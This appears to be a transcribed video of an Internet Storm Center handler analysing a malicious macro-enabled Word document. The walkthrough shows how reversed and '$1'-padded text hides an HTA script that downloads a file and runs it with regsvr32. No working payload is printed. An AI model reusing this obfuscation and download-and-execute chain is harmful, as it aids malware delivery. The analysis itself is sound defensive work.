 Hello, DDS Davens here, Senior Handler at the Internet Storm Center. Rieder Collin submitted a malicious document, an office document, a Word document with VBA code. I did the analysis here in this diary entry and now I'm going to show you here in this video. So let's run OleDump. Okay, so we have VBA code and also you can see here that file VBAproject.bin was found in the word folder. So this is an OO XML file. So the extension is not . . . the real extension is actually not . . . but . . m, okay. Now these look small. So I'm going to select all because I don't expect there to be much VBA code since the streams are small and indeed that's what we have here. So here you have a document open, so that's a start. Something is executed. Looking for keywords in the document properties and also active document content. So something is done with the content of the document, okay. So first the keywords. So let's run zipdump. And the keywords are here in the core file of the document properties. Now if you don't know that, you can just search for them. So with zipdump, do a YARA search with an ad hoc rule just for keywords, stream keywords. And then you will see that it is found here in stream in file 15 and of course also in VBAproject.bin because it is referenced there. So I can select this document 15 and do a dump. And indeed here we can see keywords. So let's do a pretty print of this XML with my tool XML dump. And here you have the keyword value. And if you take a close look, this looks like a reversed file part. See colon, users and home. So let's reverse this. So first I'm going to print this differently, having all the values for the different elements, the text inside. And here I'm going to grab four keywords, okay. So that is what we want to reverse. That is something you can do with my translate tool. Normally translate operates byte per byte. But if you give it option F, it operates on the full file in one go. And here I'm going to give it a function to reverse the string. So in Python, there is no function to reverse the string. I have to do this with the lambda function, for example. And what you have to do is make a slice like this to reverse the characters. Okay, and now indeed we can see in users public pow pow next dot hta. So an hta file is written to disk. Let's now take a look at the content of the document. The content is in Word document here. So file four, I am selecting file four and doing a dump. Okay, and that's already unusual, all those dollars and one signs. Now my XML dump tool can extract the content of a Word document, the text. So it's called word text command. And here you have the text that is inside the document. Now this is a well-known obfuscation method where a repeating string is inserted to obfuscate the actual text. And the string that you see here a lot is dollar one. Let's remove this dollar one with a stream editor. So I'm going to substitute dollar one with nothing and doing that globally. And now you can see that we have a script here, html and script. So this is hta and this looks like base 64. So let's pass this to my base 64 tool. Okay, we have a lot of false positives here. So let's put a minimum on the size, let's say 20. Okay, and here we have the base 64 string. Let's select this. Okay, this doesn't look familiar to me. Okay, so it's not another script. Let's look at the information. So entropy is 6.5. Only about half of the character set is used. So this is definitely not something compressed. Maybe this shell code. I can dump it and do a quick test with my XOR search tool. Running rules with option W, capital W, running rules to detect shell code. And here nothing is detected. So this is probably not shell code. Neither compressed. What could it be? Let's go back here to the hta and let me replace the semicolons. My semicolon and a new line. And we'll add a new line after every semicolon to make it a bit more readable. That is the script. So here we see the base 64. This looks like code to do base 64 decoding. And here we have a reverse. So something is being reversed. And then we also have a split here. So let's grab for that split for the separator. And the split separator is also somewhere here in the base 64. Here it is. So this is not one base 64 string. This here. There are probably two because of the separator. And now if you look here, this is not how base 64 encoded data should start like. It should end with this. So this is reversed. So let's reverse this. That's reversed. And now let's pass this to base64. These two things here, they decode now indeed to something that looks like a script. So let me select item number two and do a dump. Yeah, this is a reversed script. So again, the decoded base 64 code must be reversed. So let's do another translate. So let's take a slide and reverse this. Okay. And now we have here execution run regsvr32 of a file in users public tube girlload.gpg. Okay, but we don't have a gpg file yet. We don't have a gpeg file yet. And of course, if you see regsvr32, this will not be a gpeg file. So let's take a look at the other script that was number three. Okay. And this is a downloader XML HTTP. This is the URL here from where it is being downloaded. And then it is safe to file as a file with the gpeg extension. Okay. Now I tried to download this or I find it on forest total, but I had no success. I couldn't obtain the actual pfile.